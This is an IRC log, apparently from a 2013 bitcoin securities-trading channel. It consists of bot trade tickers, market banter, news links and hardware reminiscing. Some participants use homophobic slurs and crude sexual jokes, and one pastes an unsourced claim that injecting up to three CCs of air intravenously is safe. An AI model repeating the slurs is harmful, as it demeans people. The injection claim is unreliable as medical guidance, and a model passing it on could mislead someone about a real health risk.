26 22:57:21 AMAZING COMPANY! Sep 26 22:57:23 nice Sep 26 22:57:27 nicely amazing Sep 26 22:57:28 AMAZING COMPANY! Sep 26 22:57:32 lol Sep 26 22:57:33 in X-Files, Mulder's password is TrustNo1 Sep 26 22:57:34 botfail Sep 26 22:57:52 pankkake remind me to never trust anything he signs. Sep 26 22:57:54 I want some pankkake all over me Sep 26 22:58:00 with syrup Sep 26 22:58:03 and butter Sep 26 22:58:09 [BTCTC] [COGNITIVE] 1 @ 0.1424 BTC [-] Sep 26 22:58:12 usure not "with stirup" ? Sep 26 22:58:17 lol Sep 26 22:58:19 He must have changed it, it used to be 'scully15h4w7' Sep 26 22:58:35 you mean 8==Dscully ? Sep 26 22:58:41 haha Sep 26 22:58:41 haha Sep 26 22:58:46 aw shit there goes my nickserv pw Sep 26 22:59:33 phungus is right though Sep 26 22:59:35 ARMY OF ME Sep 26 22:59:38 Bjork had it right. Sep 26 22:59:54 i like orgies too much. fuck that. Sep 26 23:00:42 heh Sep 26 23:04:19 orgie of 1 Sep 26 23:05:16 [BTCTC] [ASICMINER-PT] 1 @ 1.495 BTC [-] Sep 26 23:06:17 [BTCTC] [LABCOIN] 300 @ 0.000844 = 0.2532 BTC [+] Sep 26 23:06:53 We should swap orgy stories sometime MP. Sep 26 23:07:18 [BTCTC] [KENILWORTH] 62 @ 0.00169098 = 0.1048 BTC [+] {2} Sep 26 23:07:19 Well I clicked over at the right time Sep 26 23:09:57 ;;tslb Sep 26 23:10:01 Time since last block: 5 minutes and 27 seconds Sep 26 23:10:15 ;;bc,blocks Sep 26 23:10:16 260275 Sep 26 23:12:14 kleeck okay. Sep 26 23:12:48 mod6 where you at Sep 26 23:13:29 pigeons https://twitter.com/ProBirdRights is this you ? Sep 26 23:14:43 lol Sep 26 23:15:48 jcpham: amazing. Sep 26 23:16:05 i know Sep 26 23:16:14 what are we talking about imsaguy? Sep 26 23:16:23 urmom. Sep 26 23:16:27 [BTCTC] [FN] [DMS.SELLING] 22 @ 0.004751 = 0.1045 BTC [-] Sep 26 23:16:31 fuck your face and your internet Sep 26 23:16:38 and the horse it rode in on Sep 26 23:16:54 that she did. Sep 26 23:17:01 drumroll Sep 26 23:17:01 how'd you know? is she telling stories again? Sep 26 23:17:13 my mom can't fuck the internet Sep 26 23:17:17 not the whole internet Sep 26 23:17:22 that's cray talk Sep 26 23:17:31 yet she still tries. Sep 26 23:17:33 only the male part of it ofc Sep 26 23:17:41 fags Sep 26 23:17:45 OP is a fag Sep 26 23:17:47 jurov, his mom is male. Sep 26 23:18:13 jcpham gets mad resorts to calling everyone fag Sep 26 23:18:30 you are what you smoke. Sep 26 23:18:51 who's mom is a mule ? Sep 26 23:19:22 imsaguy's mom Sep 26 23:19:35 she takes pipe like a champeeeeen Sep 26 23:20:26 dudes calm down, what is this? mpex withdrawal syndromes? Sep 26 23:24:30 lmao Sep 26 23:24:40 champeeeeeeeeeeeen Sep 26 23:24:45 that wasa good one. Sep 26 23:32:19 http://video.cnbc.com/gallery/?video=3000201609&startTime=0&endTime=404 Sep 26 23:32:22 Banking on the Bitcoin craze - CNBC Sep 26 23:33:44 [BTCTC] [LABCOIN] 531 @ 0.00080071 = 0.4252 BTC [+] {4} Sep 26 23:33:53 so, the Greek military is demanding that the Greek government steps down Sep 26 23:33:54 :-/ Sep 26 23:34:13 squawkcoin! Sep 26 23:34:16 and bail-ins are happening or about to happen in Italy, Poland, and maybe Canada Sep 26 23:34:28 yay! Sep 26 23:35:59 ftw. Sep 26 23:37:48 [HAVELOCK] [AM100] 400 @ 0.01378888 = 5.5156 BTC [-] {4} Sep 26 23:38:42 good that slovak politicians got bail-ins long ago Sep 26 23:38:49 [HAVELOCK] [AM100] 100 @ 0.0135 = 1.35 BTC [-] {2} Sep 26 23:41:00 lol the greek demands are the sheeit. Sep 26 23:41:30 they demand that they immediately get moar moneyz for being poor and also the finding and punishing of all those that didn't give them more moneyz for being poor earlier. Sep 26 23:41:59 strangely there's no cocksucking mentioned at any stage. i guess reserve military ppl are old. Sep 26 23:43:43 sounds like a job for bitcoin Sep 26 23:44:55 [BTCTC] [BTC-BOND] 203 @ 0.00915518 = 1.8585 BTC [-] {4} Sep 26 23:53:03 [BTCTC] [BTC-TRADING-PT] 18 @ 0.037 = 0.666 BTC [+] Sep 26 23:57:57 https://news.ycombinator.com/item?id=6400499 Sep 26 23:58:00 Gnu tar happily connects to remote hosts, depending on filename | Hacker News Sep 26 23:58:13 and one would think tar is embodied innocence Sep 26 23:59:18 archive the tubes in 1 easy step! Sep 27 00:01:11 [HAVELOCK] [AM1] 1 @ 1.69 BTC [-] Sep 27 00:05:22 that would be nice if you could tell it to use something else than rsh Sep 27 00:05:26 turns out, you can :) Sep 27 00:05:49 well yeah... Sep 27 00:05:52 this isn;'t news is it ? Sep 27 00:06:20 if it uses rsh by default, it's probably old as fuck Sep 27 00:06:26 right. Sep 27 00:12:22 [HAVELOCK] [AM100] 45 @ 0.01350255 = 0.6076 BTC [+] {4} Sep 27 00:14:24 [BTCTC] [LABCOIN] 600 @ 0.00081169 = 0.487 BTC [+] {2} Sep 27 00:15:38 http://www.theverge.com/2013/9/26/4772666/students-bypass-ipad-restrictions-la-school-rollout free ipads at *Theodore Roosevelt* High School Sep 27 00:15:41 Los Angeles may halt iPad rollout because students are using them for fun | The Verge Sep 27 00:16:40 lol Sep 27 00:18:00 oh wait, that's the other Roosevelt Sep 27 00:18:09 lol anyway Sep 27 00:22:31 [HAVELOCK] [SDSTM] 67 @ 0.0025585 = 0.1714 BTC [+] {2} Sep 27 00:24:33 [BTCTC] [ASICMINER-PT] 5 @ 1.4912 = 7.456 BTC [-] {3} Sep 27 00:30:39 [BTCTC] [LABCOIN] 261 @ 0.000802 = 0.2093 BTC [-] Sep 27 00:31:40 [BTCTC] [LABCOIN] 261 @ 0.000804 = 0.2098 BTC [+] Sep 27 00:32:41 [HAVELOCK] [HIM] 20 @ 0.1778 = 3.556 BTC [-] Sep 27 00:34:09 "I'm thinking of selling 10,000 ActM shares for 0.0019 and buying LC @ 0.0007 for 27,142 shares." Sep 27 00:34:43 [HAVELOCK] [VTX] 1 @ 0.51 BTC [+] Sep 27 00:34:56 well yes Sep 27 00:34:56 it's always a good idea to announce one's trades in advance. Sep 27 00:34:59 more shares is better Sep 27 00:35:43 lol Sep 27 00:35:44 [HAVELOCK] [B] [XBOND] 230 @ 0.001209 = 0.2781 BTC [+] Sep 27 00:36:22 people are so math impaired anyway- you throw a extra variable in there - like bitcoin is really screws them up Sep 27 00:36:44 no no, more shares IS better. Sep 27 00:36:45 [BTCTC] [LABCOIN] 600 @ 0.00077 = 0.462 BTC [-] Sep 27 00:36:56 because there's more of them. like if you had a phone number right ? Sep 27 00:37:00 it'd be better to have two. Sep 27 00:37:18 when in reality it's better to have more numbers in your phone number Sep 27 00:37:24 if I understand your analogy Sep 27 00:37:40 hey pankkake Sep 27 00:37:46 [BTCTC] [LABCOIN] 2486 @ 0.000761 = 1.8918 BTC [-] {2} Sep 27 00:37:47 no, the phone no should start with a high value such as 9 or 8 Sep 27 00:37:55 i know you like numbers in your shares so i've put more phones in your phone number. Sep 27 00:37:56 10% gain on more cheap shares is better than 10% gain on more expensive right? Sep 27 00:38:11 jborkl depends if they have a logo. Sep 27 00:38:20 oh yeah my bad Sep 27 00:38:23 like a good one. like with a handshake or something Sep 27 00:38:47 [BTCTC] [LABCOIN] 522 @ 0.000766 = 0.3999 BTC [+] {2} Sep 27 00:38:51 shit, my ☎ number starts with 01, I'm so poor Sep 27 00:38:52 IP on a good logo is what like a million or so Sep 27 00:38:53 amazing logo Sep 27 00:38:53 plus also shares sometimes split. Sep 27 00:38:53 AMAZING COMPANY! Sep 27 00:39:26 yeah pankkake thats a low amount of phone number Sep 27 00:39:33 ahahaha Sep 27 00:39:48 [BTCTC] [LABCOIN] 812 @ 0.000773 = 0.6277 BTC [+] {2} Sep 27 00:40:23 he last diff change broke the blockchain, lol Sep 27 00:40:49 [HAVELOCK] [VTX] 1 @ 0.525 BTC [+] Sep 27 00:40:57 at least if no one solves a block, I wont lose out on any mining income Sep 27 00:41:27 but if *really* no one does, then you will lose Sep 27 00:41:44 I kid I kid Sep 27 00:41:50 [HAVELOCK] [VTX] 1 @ 0.549 BTC [+] Sep 27 00:42:23 its ok, at this point we will hit the 4 year mark in 2 years anyway Sep 27 00:42:51 [HAVELOCK] [VTX] 3 @ 0.54942996 = 1.6483 BTC [+] {3} Sep 27 00:43:52 [HAVELOCK] [VTX] 2 @ 0.5497 = 1.0994 BTC [+] {2} Sep 27 00:44:26 ;;tslsex Sep 27 00:44:38 i guess not huh. Sep 27 00:44:40 ;;tslb Sep 27 00:47:28 The potential danger of an air embolism is often greatly overestimated by IV users; up to three CCs of air can be injected intravenously without causing complications, and time spent meticulously getting every minute air bubble out of the syringe would often be better spent ensuring clean conditions in general. Sep 27 00:47:29 til. Sep 27 00:47:29 Error: "tslsex" is not a valid command. Sep 27 00:47:38 Time since last block: 4 minutes and 49 seconds Sep 27 00:47:56 [BTCTC] [LABCOIN] 4274 @ 0.00076116 = 3.2532 BTC [-] {2} Sep 27 00:50:03 no one likes to have frothy blood Sep 27 00:50:05 is the future organizations offering their shares on their own exchange? Sep 27 00:50:13 privat exchange Sep 27 00:50:16 does anyone do that? Sep 27 00:50:26 asicminer? Sep 27 00:50:35 hmm they run their own exchange? Sep 27 00:51:00 planned to, but don't see any pressing need Sep 27 00:51:05 hmm Sep 27 00:51:18 that would be an interesting way to distribute divs Sep 27 00:51:22 no middle-man needed Sep 27 00:51:32 sorry mircea Sep 27 00:51:33 :-) Sep 27 00:52:09 but you're not asicminer, to atract such liquidity Sep 27 00:52:13 no Sep 27 00:52:17 BitVPS Sep 27 00:52:24 but we're a revenue share security anyway Sep 27 00:52:32 so, only shares of profits Sep 27 00:53:03 we probably have like 5 shareholders total anyway Sep 27 00:53:11 lol Sep 27 00:54:04 phungus mpex does. btct used to. Sep 27 00:54:12 glbse also used to, sort of, kinda, ended up a lulzfest. Sep 27 00:54:29 heh Sep 27 00:54:39 yeah I remembr nefario drama Sep 27 00:55:04 [BTCTC] [LABCOIN] 6725 @ 0.00074451 = 5.0068 BTC [-] {8} Sep 27 00:55:55 !t BTCTCO BITVPS Sep 27 00:55:59 [BTCT:BITVPS] 1D: 0.0005001 / 0.00092 / 0.001698 (9476 shares, 8.7 BTC), 7D: 0.000025 / 0.00101 / 0.001997 (31503 shares, 31.7 BTC), 30D: 0.000025 / 0.00129 / 0.002899 (40585 shares, 52.4 BTC) Sep 27 00:56:04 [BTCTC] [LABCOIN] 7225 @ 0.00071062 = 5.1342 BTC [-] {5} Sep 27 00:56:18 someone totally dumped Sep 27 00:56:19 lol Sep 27 00:57:05 [BTCTC] [LABCOIN] 6075 @ 0.00068533 = 4.1634 BTC [-] {8} Sep 27 00:58:28 "There have been rare cases of air embolism being caused by air entering the bloodstream from the uterus or tears in female genitalia." Sep 27 00:58:43 i suppose this is now the superlative fuck. girl dies from air embolism due to well... failed queef. Sep 27 00:59:07 [BTCTC] [LABCOIN] 5814 @ 0.00066168 = 3.847 BTC [-] {8} Sep 27 01:00:08 [BTCTC] [LABCOIN] 3695 @ 0.00064014 = 2.3653 BTC [-] {5} Sep 27 01:00:08 [BTCTC] [FN] [DMS.SELLING] 200 @ 0.00515 = 1.03 BTC [+] Sep 27 01:00:24 that is disturbing Sep 27 01:01:09 [HAVELOCK] [AM100] 100 @ 0.0136 = 1.36 BTC [+] Sep 27 01:01:10 [BTCTC] [ASICMINER-PT] 1 @ 1.53 BTC [+] Sep 27 01:05:13 [BTCTC] [FN] [DMS.SELLING] 100 @ 0.005426 = 0.5426 BTC [+] Sep 27 01:11:19 [BTCTC] [DMS.MINING] 986 @ 0.00127533 = 1.2575 BTC [+] {3} Sep 27 01:13:21 [HAVELOCK] [B] [XBOND] 130 @ 0.001209 = 0.1572 BTC [+] {3} Sep 27 01:16:24 [BTCTC] [LABCOIN] 196 @ 0.000744 = 0.1458 BTC [+] Sep 27 01:19:27 [BTCTC] [ASICMINER-PT] 1 @ 1.52 BTC [-] Sep 27 01:38:46 [BTCTC] [LABCOIN] 3962 @ 0.00066861 = 2.649 BTC [-] {3} Sep 27 01:40:48 [BTCTC] [LABCOIN] 17043 @ 0.00062921 = 10.7236 BTC [-] {4} Sep 27 01:41:49 [BTCTC] [LABCOIN] 3200 @ 0.000628 = 2.0096 BTC [-] {2} Sep 27 01:42:50 [BTCTC] [LABCOIN] 12371 @ 0.0006235 = 7.7133 BTC [-] {6} Sep 27 01:46:13 Anyone know how long it takes for TAT to move shares from btct to the other sites once you send the email? Sep 27 01:49:16 afaik within a shorter timeframe, if he is there Sep 27 01:49:36 at least several people already reported in the havelock transfer thread that their transfer was processed Sep 27 01:50:14 Nice, just weird seeing them gone from btct but not on my bitfunder yet. I have faith though Sep 27 01:50:42 i'm sure everything is very fine Sep 27 01:50:48 Yeah Sep 27 01:51:59 [BTCTC] [LABCOIN] 1000 @ 0.0006115 = 0.6115 BTC [-] Sep 27 01:53:00 [BTCTC] [ACTIVEMINING] 1000 @ 0.0014132 = 1.4132 BTC [-] {4} Sep 27 01:59:07 [BTCTC] [FN] [DMS.SELLING] 990 @ 0.00515 = 5.0985 BTC [-] Sep 27 02:01:09 [HAVELOCK] [AM1] 2 @ 1.64 = 3.28 BTC [-] Sep 27 02:15:22 [BTCTC] [ACTIVEMINING] 90 @ 0.001426 = 0.1283 BTC [+] Sep 27 02:15:22 [BTCTC] [LABCOIN] 614 @ 0.00070872 = 0.4352 BTC [+] {2} Sep 27 02:16:23 [BTCTC] [LABCOIN] 250 @ 0.0006116 = 0.1529 BTC [-] Sep 27 02:21:33 http://www.piperwallet.com/ Sep 27 02:21:36 Piper: A bitcoin paper wallet printer powered by the Rasbperry Pi Sep 27 02:23:45 ha. Sep 27 02:24:31 [HAVELOCK] [HIM] 5 @ 0.1778 = 0.889 BTC [-] Sep 27 02:24:42 Piper is the only offline paper wallet printer to pass all 26 of the "good" Dieharder tests for secure random number generation Sep 27 02:25:15 interesting. how do they have good rng though, from an isolated machine with no inputs? Sep 27 02:25:47 usb rnd gen maybe Sep 27 02:26:36 "Built-in hardware random number generator" Sep 27 02:27:10 mhm Sep 27 02:28:14 they dobn't have good rng. Sep 27 02:28:27 they have in the best case some avalanche noise which is the suck. Sep 27 02:29:22 it would be easy to do some good rng on such device though, add things like mic, temperature sensor, or even accelerometer Sep 27 02:29:31 ask the user to shake it! Sep 27 02:30:19 http://www.reddit.com/r/Bitcoin/comments/1dsr5m/ann_piper_a_hardwarebased_paper_wallet_printer/c9trs3o Sep 27 02:30:21 GrainElevator comments on [ANN] Piper - A hardware-based paper wallet printer and so much more Sep 27 02:31:35 well, that sucks. and providing the seed themselves is worse Sep 27 02:33:23 "Hook Piper up to a display, mouse, and keyboard and customize Piper to do whatever you want. It's all Linux based, open source, and based on the Raspberry Pi platform." Sep 27 02:33:40 [BTCTC] [FN] [DMS.SELLING] 1436 @ 0.0052865 = 7.5914 BTC [+] {2} Sep 27 02:37:44 [BTCTC] [BASIC-MINING] 6 @ 0.06850166 = 0.411 BTC [+] {2} Sep 27 02:38:45 [BTCTC] [ASICMINER-PT] 2 @ 1.5 = 3 BTC [-] Sep 27 02:49:56 [HAVELOCK] [B] [XBOND] 1000 @ 0.00118905 = 1.1891 BTC [-] {2} Sep 27 02:53:45 ;;ticker s.mg Sep 27 02:53:46 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX] [--market |all]) -- Return pretty-printed ticker. Default market is Mtgox. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure the code (1 more message) Sep 27 02:54:29 !mp s.mg Sep 27 02:54:30 Please use http://dpaste.com/ Sep 27 02:55:01 [BTCTC] [ACTIVEMINING] 656 @ 0.00141566 = 0.9287 BTC [-] {6} Sep 27 02:56:09 ;;t m s.mg Sep 27 02:56:11 Error: This url is not on the whitelist. Sep 27 02:56:12 eh Sep 27 02:56:16 !t m s.mg Sep 27 02:56:17 How can I be of assistance, my poor man? Sep 27 02:56:21 but is down Sep 27 02:57:02 thanks for trying kakobrekla Sep 27 02:59:32 it's down atm so not much assbot can do for you Sep 27 03:03:24 does assbot have a pleasure mode? Sep 27 03:04:30 yes, !insert buttplug Sep 27 03:04:35 thanks mircea_popescu. is there a depthjson command for the !mp thingy? Sep 27 03:04:56 !insert buttplug Sep 27 03:04:59 you shove some buttcoins up my butt and amazing pleasure is to be had Sep 27 03:05:00 nope Sep 27 03:05:43 yeah. Sep 27 03:05:58 bloctoc http://trilema.com/2013/the-many-ways-available-for-talking-to-mpex/ Sep 27 03:06:02 once it's back at least Sep 27 03:07:51 thanks Sep 27 03:09:14 [BTCTC] [FN] [DMS.SELLING] 260 @ 0.005418 = 1.4087 BTC [+] **** ENDING LOGGING AT Fri Sep 27 03:36:30 2013 **** BEGIN LOGGING AT Fri Sep 27 03:36:57 2013 Sep 27 03:37:21 -NickServ- You failed to identify in time for the nickname mircea_popescu Sep 27 03:40:46 [BTCTC] [ASICMINER-PT] 2 @ 1.5195 = 3.039 BTC [+] {2} Sep 27 03:43:51 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] Sep 27 03:44:50 [BTCTC] [ASICMINER-PT] 1 @ 1.492 BTC [-] Sep 27 03:45:51 [BTCTC] [B.YABMC] 1219 @ 0.00035 = 0.4267 BTC [-] Sep 27 03:45:51 [BTCTC] [LABCOIN] 600 @ 0.000652 = 0.3912 BTC [+] Sep 27 03:46:52 [BTCTC] [LABCOIN] 1815 @ 0.0006511 = 1.1817 BTC [-] {2} Sep 27 03:51:57 [BTCTC] [ASICMINER-PT] 6 @ 1.50016666 = 9.001 BTC [+] {2} **** ENDING LOGGING AT Fri Sep 27 03:54:21 2013 **** BEGIN LOGGING AT Fri Sep 27 03:55:05 2013 Sep 27 04:19:24 [BTCTC] [LABCOIN] 21255 @ 0.00086092 = 18.2989 BTC [+] {18} Sep 27 04:36:41 [BTCTC] [LABCOIN] 392 @ 0.000883 = 0.3461 BTC [-] Sep 27 04:39:44 [BTCTC] [BTC-BOND] 11 @ 0.00924545 = 0.1017 BTC [+] {2} Sep 27 04:40:45 [BTCTC] [COGNITIVE] 4 @ 0.142575 = 0.5703 BTC [+] {3} Sep 27 04:43:48 [BTCTC] [BASIC-MINING] 2 @ 0.0675 = 0.135 BTC [-] {2} Sep 27 04:44:21 http://arstechnica.com/security/2013/07/bad-kitty-rooky-mistake-in-cryptocat-chat-app-makes-cracking-a-snap/ Sep 27 04:44:23 Bad kitty “Rookie mistake” in Cryptocat chat app makes cracking a snap | Ars Technica Sep 27 04:47:53 [BTCTC] [MININGCO.ETF] 4 @ 0.05499 = 0.22 BTC [+] Sep 27 04:52:57 [BTCTC] [LABCOIN] 3510 @ 0.00087424 = 3.0686 BTC [-] {5} Sep 27 05:02:06 [BTCTC] [LABCOIN] 374 @ 0.00078738 = 0.2945 BTC [-] {7} Sep 27 05:02:12 http://www.cftc.gov/PressRoom/PressReleases/pr6708-13 Sep 27 05:02:17 CFTC Charges ICAP Europe Limited, a Subsidiary of ICAP plc, with Manipulation and Attempted Manipula Sep 27 05:05:35 https://home.chicagobusiness.com/clickshare/authenticateUserSubscription.do?CSProduct=crainschicago-metered&CSAuthReq=1:473513749719958:AID:926545CAB76F7A24148757C7B02300D8&AID=/20130917/NEWS01/130919811&title=Chicago%20trading%20firm%20DRW%20sues%20CFTC%20to%20block%20expected%20action&CSTargetURL=http://www.chicagobusiness.com/article/20130917/NEWS01/130919811/chicago-trading-firm-drw-sues-cftc-to-block-expected-acti Sep 27 05:05:35 on Sep 27 05:05:41 Crain's Chicago Business : Subscription Center Sep 27 05:05:42 tons of these Sep 27 05:06:03 lol dumb url. Sep 27 05:06:04 http://www.chicagobusiness.com/article/20130917/NEWS01/130919811/chicago-trading-firm-drw-sues-cftc-to-block-expected-action Sep 27 05:06:09 Crain's Chicago Business : Subscription Center Sep 27 05:06:10 [BTCTC] [LABCOIN] 584 @ 0.00069474 = 0.4057 BTC [-] {3} Sep 27 05:07:11 [BTCTC] [LABCOIN] 3346 @ 0.00068222 = 2.2827 BTC [-] {6} Sep 27 05:12:32 myea Sep 27 05:13:16 [BTCTC] [BTC-TRADING-PT] 20 @ 0.037 = 0.74 BTC [+] Sep 27 05:33:38 [HAVELOCK] [CFIG] 1 @ 0.1078165 BTC [+] Sep 27 05:36:39 [BTCTC] [LABCOIN] 2961 @ 0.00068469 = 2.0274 BTC [-] {6} Sep 27 05:51:25 ok so just to give everyone a headsup : Sep 27 05:52:30 everything is online and functioning normally at the moment. it's not open to the internet because I would like to do more testing and make sure everything runs smoothly. Sep 27 05:52:46 there will be a trilema update with the new key and other details in a few hours, Sep 27 05:53:06 trade will resume 24 hours after that to give everyone a chance to catch up. Sep 27 05:56:45 Hi Sep 27 05:57:44 ello Sep 27 05:58:20 How are you mircea_popescu? Sep 27 05:59:01 [BTCTC] [LABCOIN] 5000 @ 0.00077663 = 3.8832 BTC [+] {5} Sep 27 06:02:16 not bad. Sep 27 06:02:44 Good, I'm new here, just lurking right now Sep 27 06:03:13 howdja find the channel ? Sep 27 06:03:53 mircea_popescu: One of my friends from Coin Chat. Sep 27 06:04:22 BingoBoingo Sep 27 06:04:28 ah Sep 27 06:04:47 so what do you dev ? Sep 27 06:06:04 Well, I own a few popular Bitcoin related sites Sep 27 06:06:08 [BTCTC] [BITVPS] 420 @ 0.0008001 = 0.336 BTC [-] {2} Sep 27 06:07:43 mircea_popescu: http://devfaucet.com Sep 27 06:08:22 aha Sep 27 06:13:51 And I've also helped starting a Bitcoin related blog Sep 27 06:13:59 recently, http://plaxant.com Sep 27 06:14:26 i see! Sep 27 06:15:02 Let me know what you think of the articles Sep 27 06:18:53 Gonna head to bed, goodnight! Sep 27 06:25:45 http://news.goldseek.com/GoldSeek/1380224271.php Sep 27 06:25:53 This morning the National Bank of Panama announced that it was suspending all services until Tuesday the 1st of October. The National Bank of Panama says that the reason is to upgrade systems. The Banking Holiday in Panama was announced this am. Sep 27 06:25:56 dude fucking copycats. Sep 27 06:27:29 [HAVELOCK] [CFIG] 3 @ 0.1078165 = 0.3234 BTC [+] Sep 27 06:27:31 [BTCTC] [LABCOIN] 3986 @ 0.00082385 = 3.2839 BTC [+] {4} Sep 27 06:27:53 aha Sep 27 06:27:55 h Sep 27 06:28:10 lol Sep 27 06:42:44 [BTCTC] [NASTY-PT] 100 @ 0.00134008 = 0.134 BTC [+] {2} Sep 27 07:02:03 [BTCTC] [LABCOIN] 3000 @ 0.00082674 = 2.4802 BTC [-] {4} Sep 27 07:04:11 http://blog.sbf5.com/?p=50&cpage=1#comment-113218 Sep 27 07:09:10 [BTCTC] [LABCOIN] 1500 @ 0.00082747 = 1.2412 BTC [+] {2} Sep 27 07:13:14 [BTCTC] [LABCOIN] 713 @ 0.0008269 = 0.5896 BTC [-] {2} Sep 27 07:24:25 [BTCTC] [BTC-TRADING-PT] 5 @ 0.037 = 0.185 BTC [+] Sep 27 07:26:27 [BTCTC] [BTC-TRADING-PT] 3 @ 0.037 = 0.111 BTC [+] Sep 27 07:29:30 [BTCTC] [ASICMINER-PT] 1 @ 1.49 BTC [-] Sep 27 07:39:40 [HAVELOCK] [AM1] 1 @ 1.64 BTC [-] Sep 27 07:40:41 [BTCTC] [ASICMINER-PT] 8 @ 1.5015 = 12.012 BTC [+] {2} Sep 27 07:43:44 [HAVELOCK] [AM1] 1 @ 1.68 BTC [+] Sep 27 07:46:47 [HAVELOCK] [AM100] 65 @ 0.014479 = 0.9411 BTC [+] Sep 27 07:58:59 [BTCTC] [LABCOIN] 320 @ 0.000789 = 0.2525 BTC [-] Sep 27 08:01:01 [BTCTC] [LABCOIN] 556 @ 0.000789 = 0.4387 BTC [-] {2} Sep 27 08:03:03 [BTCTC] [LABCOIN] 208 @ 0.00078919 = 0.1642 BTC [+] {2} Sep 27 08:12:13 whats the latest ? Sep 27 08:14:13 [BTCTC] [LABCOIN] 320 @ 0.000792 = 0.2534 BTC [+] Sep 27 08:15:14 [BTCTC] [LABCOIN] 320 @ 0.000789 = 0.2525 BTC [-] Sep 27 08:16:15 [BTCTC] [ASICMINER-PT] 4 @ 1.505 = 6.02 BTC [+] Sep 27 08:18:17 [BTCTC] [LABCOIN] 1278 @ 0.00078224 = 0.9997 BTC [-] {6} Sep 27 08:19:18 [BTCTC] [LABCOIN] 39606 @ 0.0007196 = 28.5005 BTC [-] {22} Sep 27 08:35:34 [BTCTC] [FN] [BTC-GROWTH] 23 @ 0.073 = 1.679 BTC [-] Sep 27 08:51:50 [BTCTC] [ASICMINER-PT] 8 @ 1.504 = 12.032 BTC [-] Sep 27 08:53:55 lerrrrrbcorrrrn Sep 27 08:54:25 doin an amazing jerrrb Sep 27 08:54:25 AMAZING COMPANY! Sep 28 10:21:01 wb Sep 28 10:23:47 why ty. Sep 28 10:24:02 [BTCTC] [ASICMINER-PT] 6 @ 1.49 = 8.94 BTC [+] Sep 28 10:24:42 do you wish any twisted revenge on the attacker? Sep 28 10:25:54 if you have any leads, i'd delight in replacing his computer with a broken amstrad Sep 28 10:26:12 what do i care lol. Sep 28 10:26:41 ppl wish to donate their time for the strengthening of mpex and spreading of the gpg goodword, all the better. Sep 28 10:26:51 true as true Sep 28 10:27:04 [BTCTC] [LABCOIN] 1000 @ 0.00054034 = 0.5403 BTC [-] {2} Sep 28 10:27:12 i'll be a lot more worried when everyone stops trying tbh. Sep 28 10:28:46 anyway, i see a bunch of people have already sent their keys, keep em coming. Sep 28 10:31:41 seriously , i need a new computer Sep 28 10:34:23 what, you're on a ductaped together amstrad ? Sep 28 10:35:18 no Sep 28 10:35:21 "what 686 ?! I got a 464!!!" Sep 28 10:35:34 is 686n a thing? Sep 28 10:35:47 is that dual core? Sep 28 10:36:13 [BTCTC] [COGNITIVE] 10 @ 0.1423 = 1.423 BTC [-] Sep 28 10:36:26 Vexual: http://en.wikipedia.org/wiki/P6_(microarchitecture) Sep 28 10:37:10 [\\\] hm ? Sep 28 10:37:23 <[\\\]> you were collecting keys, so I started throwing random ones out Sep 28 10:37:42 oty. Sep 28 10:37:55 <[\\\]> nothing like a keyring with random keys Sep 28 10:38:04 <[\\\]> it makes unlocking more interesting Sep 28 10:38:06 lolk Sep 28 10:39:09 heh, im actually still running a up-to-date 686 fbsd host: Sep 28 10:39:10 % dmesg | grep "CPU" Sep 28 10:39:10 CPU: AMD Athlon(tm) (900.16-MHz 686-class CPU) Sep 28 10:39:23 runs like a champ hahah Sep 28 10:39:43 i burnt my fingerprints off on a 386 Sep 28 10:40:24 whot fan? Sep 28 10:40:28 mod6 wouldn't surprise me if they will soon sell at a premium. Sep 28 10:40:41 pretty much the last generation where people can be certain no nsa skulldruggery was added. Sep 28 10:40:57 yeah! Sep 28 10:41:04 rasta don't work for no cia Sep 28 10:42:56 http://www.youtube.com/watch?v=E3St0Q2e_74 Sep 28 10:42:57 Bob Marley - Rat Race - YouTube Sep 28 10:45:02 This box is the last one remaining of the 5 I built back in 2001 or so. I did replace the PS at one point on this one. But I built these boxes from new parts @ newegg. Sep 28 10:45:26 first celeron? Sep 28 10:45:40 All of them were just for my personal NOC. Cost me like $1500 or something. Was a steal at the time for 5 built hosts. Sep 28 10:46:04 i used to sell pcs when i was 15 Sep 28 10:46:18 dem profit margins Sep 28 10:46:34 Vexual: they were all of the same config -- the athlon 900mhz Sep 28 10:46:56 real memory = 268435456 (256 MB) Sep 28 10:46:57 lol Sep 28 10:47:08 amazing Sep 28 10:47:08 AMAZING COMPANY! Sep 28 10:47:13 for reals Sep 28 10:47:19 no shit Sep 28 10:48:24 thing has like 12-13 years of nearly 100% uptime. except moves, a few power outages. the PS used to knock so bad because the PS fan had a bad bearing. I finally replaced it. Sep 28 10:48:42 Once I did, I missed the white noise from the damn thing. Sep 28 10:48:45 haha Sep 28 10:49:39 *ka-clack* *ka-clack* *bzzzzz* *ka-clack* Sep 28 10:50:58 they dont build em like the used to Sep 28 10:51:28 heheh, i suppose they dont. thing used to just run ircd and bind. Sep 28 10:51:28 [BTCTC] [LABCOIN] 13000 @ 0.00049342 = 6.4145 BTC [-] {19} Sep 28 10:51:56 now hey play fuckin 4k Sep 28 10:53:27 speaking of amazing company... is that a new low? Sep 28 10:53:27 AMAZING COMPANY! Sep 28 10:53:53 $ave btctc labcoin Sep 28 10:54:12 second hand xbox.million dollars! Sep 28 10:54:13 <[\\\]> amazing company is amazing Sep 28 10:54:13 AMAZING COMPANY! Sep 28 10:54:13 AMAZING COMPANY! Sep 28 10:54:21 <[\\\]> oh god Sep 28 10:54:23 hahaha Sep 28 10:54:29 ut oh Sep 28 10:54:34 <[\\\]> amazing amazing amazing amazing amazing amazing Sep 28 10:54:35 AMAZING COMPANY! Sep 28 10:54:35 AMAZING COMPANY! Sep 28 10:54:35 AMAZING COMPANY! Sep 28 10:54:35 AMAZING COMPANY! Sep 28 10:54:35 AMAZING COMPANY! Sep 28 10:54:36 AMAZING COMPANY! Sep 28 10:54:41 <[\\\]> might wanna cap that Sep 28 10:54:53 srls.y Sep 28 10:55:06 <[\\\]> kakobrekla ^^ Sep 28 10:55:26 <[\\\]> good thing supa isn't around atm Sep 28 10:56:00 mod6 i had a fan do that once. so i took the fan apart. Sep 28 10:56:02 it was a pube. Sep 28 10:57:26 lmao Sep 28 10:57:57 gotta love it Sep 28 10:58:25 you dont look like the sort with airbourne pubes mp Sep 28 10:58:45 was it blonde? Sep 28 10:58:54 nope. Sep 28 10:58:56 